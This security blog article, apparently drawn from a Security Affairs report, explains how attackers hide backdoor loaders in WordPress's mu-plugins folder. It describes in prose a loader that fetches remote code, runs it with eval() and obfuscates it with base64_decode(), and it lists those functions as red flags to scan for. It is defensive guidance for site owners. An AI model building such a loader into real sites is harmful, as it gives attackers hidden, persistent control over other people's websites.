The Silent Threat: How Hackers Hide Backdoors in Your WordPress mu-Plugins Folder
As a WordPress site owner, you know that security is a constant battle. You keep your plugins updated, use strong passwords, and maybe even have a security plugin running. But what if a backdoor was hiding in a place you rarely, if ever, check? Hackers are increasingly targeting a specific, powerful part of your WordPress installation: the mu-plugins folder.
This folder, short for “Must-Use Plugins,” is a prime location for malicious code because any plugin placed here is automatically activated and cannot be disabled from the WordPress admin dashboard. This gives attackers a persistent, hidden foothold on your website that can be difficult to detect.
Understanding how this attack works is the first step toward protecting your site.
What Are mu-Plugins and Why Are They a Target?
The wp-content/mu-plugins/ directory is a special feature in WordPress. Unlike regular plugins that you install and activate through the dashboard, any PHP file placed in this folder is executed automatically on every page load. Legitimate developers use this for core site functionality that should always be running.
However, this “always on” nature makes it an ideal hiding spot for malware. An attacker who gains access to your file system can drop a malicious file here, and it will immediately start running. Since it doesn’t appear in your regular plugin list, you could have a backdoor active for months without ever knowing it.
Anatomy of a mu-Plugins Backdoor
The attacks we’re seeing are both simple and clever. They don’t place a large, obvious malware file on your server. Instead, they use a small, discreet “loader” file.
Here’s how the infection unfolds:
The Malicious Loader: The attacker places a single, seemingly harmless PHP file inside your
wp-content/mu-plugins/folder. The file might have an innocent-sounding name likedb-options.phporsecurity.phpto avoid suspicion.Fetching the Payload: This small loader file contains a critical piece of code, often using the PHP function
file_get_contents(). This function is instructed to connect to a remote, third-party server (like Pastebin or a custom attacker-controlled domain) and download the actual malicious code.Executing the Code: Once the malicious payload is downloaded, the loader file uses another dangerous function,
eval(), to execute it directly. Theeval()function is a major security risk because it runs any code given to it as if it were part of the original file. To hide their tracks, attackers often obfuscate this code using functions likebase64_decode(), making it unreadable at a glance.
The result is a fully functional backdoor on your site. The attacker can now gain administrator access, inject spam links into your footer, redirect your visitors to malicious websites, or use your server to attack other sites—all while the source of the infection remains hidden from your view in the admin dashboard.
How to Find and Remove This Hidden Malware
If you suspect your site might be compromised or want to perform a proactive check, you need to look at your site’s files directly.
Step 1: Inspect Your mu-Plugins Folder
Using an FTP client or the File Manager in your hosting control panel, navigate to the wp-content/mu-plugins/ directory. This folder may not exist on all WordPress installations, but if it does, examine its contents carefully. Look for any files you don’t recognize or didn’t put there yourself.
Step 2: Scrutinize Suspicious Files
Open any suspicious PHP files in a text editor. You don’t need to be a developer to spot the red flags. Look specifically for the following functions:
eval()base64_decode()file_get_contents()gzuncompress()str_rot13()
If you see these functions, especially when combined with strange, unreadable text or URLs pointing to external websites, you have likely found a backdoor.
Step 3: Delete the Malicious File
The solution is straightforward: simply delete the malicious PHP file from the mu-plugins folder. Once the file is gone, the backdoor is closed.
Essential Security Steps After a Cleanup
Removing the malware is just the first step. You must assume the attacker had full control of your site and take immediate action to secure it.
- Change All Passwords: This is non-negotiable. Immediately change your WordPress admin passwords, database passwords, FTP passwords, and your hosting account password.
- Update Everything: Ensure your WordPress core, all themes, and all plugins are updated to their latest versions to patch any vulnerabilities that may have allowed the initial intrusion.
- Scan Your Entire Site: Use a reputable security plugin like Wordfence or Sucuri Scanner to perform a deep scan of all your website files. This will help you find any other backdoors or malicious code the attacker may have left behind.
- Review User Accounts: Check for any new or unauthorized administrator accounts in your WordPress Users panel and delete them immediately.
By regularly monitoring all of your site’s files—not just the ones you can see in the dashboard—you can stay one step ahead of attackers. Don’t let your mu-plugins folder become a blind spot in your security strategy.
Source: https://securityaffairs.com/180311/malware/stealth-backdoor-found-in-wordpress-mu-plugins-folder.html
